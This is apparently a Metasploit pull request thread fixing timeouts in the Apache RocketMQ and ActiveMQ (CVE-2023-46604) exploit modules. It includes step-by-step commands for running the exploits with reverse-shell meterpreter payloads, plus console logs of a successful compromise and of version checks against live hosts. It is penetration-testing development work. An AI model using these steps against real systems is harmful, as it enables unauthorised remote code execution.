Apache RocketMQ & ActiveMQ fixes

[jheysel-r7]

Fixes a timeout issue that was being seen when running the following modules:

• modules/exploits/multi/http/apache_rocketmq_update_config.rb
• modules/exploits/multi/misc/apache_activemq_rce_cve_2023_46604.rb

Once this PR is landed we should be able to close #19037 & #19038

Verification

RocketMQ

1. Start msfconsole.
2. Do: use exploit/multi/http/apache_rocketmq_update_config.
3. Set the RHOST and LHOST options.
4. Run the module.
5. Receive a session in the context of the user running the RocketMQ application.

ActiveMQ

Steps (Linux target):

1. Start msfconsole
2. use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
3. set RHOST <LINUX_TARGET_IP>
4. set SRVHOST eth0
5. set target 1
6. set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
7. check
8. exploit

Ensure neither module hangs, times out or errors in any unexpected way (they shouldn't).

Testing

RocketMQ

msf6 exploit(multi/http/apache_rocketmq_update_config) > options

Module options (exploit/multi/http/apache_rocketmq_update_config):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   BROKER_PORT  10911            no        The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommen
                                           ded)
   CHOST                         no        The local client address
   CPORT                         no        The local client port
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        9876             yes       The RocketMQ NameServer port (TCP)
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ezCLiIlwE        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               4434             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/apache_rocketmq_update_config) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4434
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 11 opened (172.16.199.1:4434 -> 172.16.199.1:59206) at 2024-04-26 14:09:31 -0700

meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : CentOS 7.9.2009 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 11

[*] 127.0.0.1 - Meterpreter session 11 closed.  Reason: User exit

ActiveMQ

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Unix



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 127.0.0.1:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.6

[smcintyre-r7]

I went and tested this against an HTTPS server again, and the #timed_read method returns nil when it times out so I made some suggestions to accommodate that.

[smcintyre-r7]

Thanks @jheysel-r7, I just ran through the tests and things are looking much better now. I confirmed that apache_rocketmq_update_config is still executing its payload and it's check method is much faster now when targeting and HTTPS server:

metasploit-framework (S:0 J:0) exploit(multi/http/apache_rocketmq_update_config) > check
[*] 18.220.174.0:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
metasploit-framework (S:0 J:0) exploit(multi/http/apache_rocketmq_update_config) > check https://zerosteiner.com
[*] 192.168.249.3:443 - Cannot reliably check exploitability. Unable to determine the version

auxiliary/scanner/misc/rocketmq_version is also still working and much faster when targeting an invalid server.

metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > set RHOSTS 18.220.174.0
RHOSTS => 18.220.174.0
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > run

[+] 18.220.174.0:9876     - RocketMQ version V4.9.4 found with brokers: [{"brokerAddrs"=>{"0"=>"172.17.0.3:10911"}, "brokerName"=>"broker-a", "cluster"=>"DefaultCluster"}]
[*] 18.220.174.0:9876     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > run https://zerosteiner.com

[-] 192.168.249.3:443     - Invalid or no response received
[*] https://zerosteiner.com:9876 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
metasploit-framework (S:0 J:0) auxiliary(scanner/misc/rocketmq_version) > 

Finally, exploit/multi/misc/apache_activemq_rce_cve_2023_46604 is much faster when targeting an HTTPS server.

metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > time check https://zerosteiner.com
[*] 192.168.249.3:443 - Cannot reliably check exploitability.
[+] Command "check https://zerosteiner.com" completed in 10.14058061500009 seconds
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 18.220.174.0:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
metasploit-framework (S:0 J:0) exploit(multi/misc/apache_activemq_rce_cve_2023_46604) >

[smcintyre-r7]

Release Notes

This fixes timeout issues encountered by rocketmq and activemq modules that would occur when the target is not running the expected service.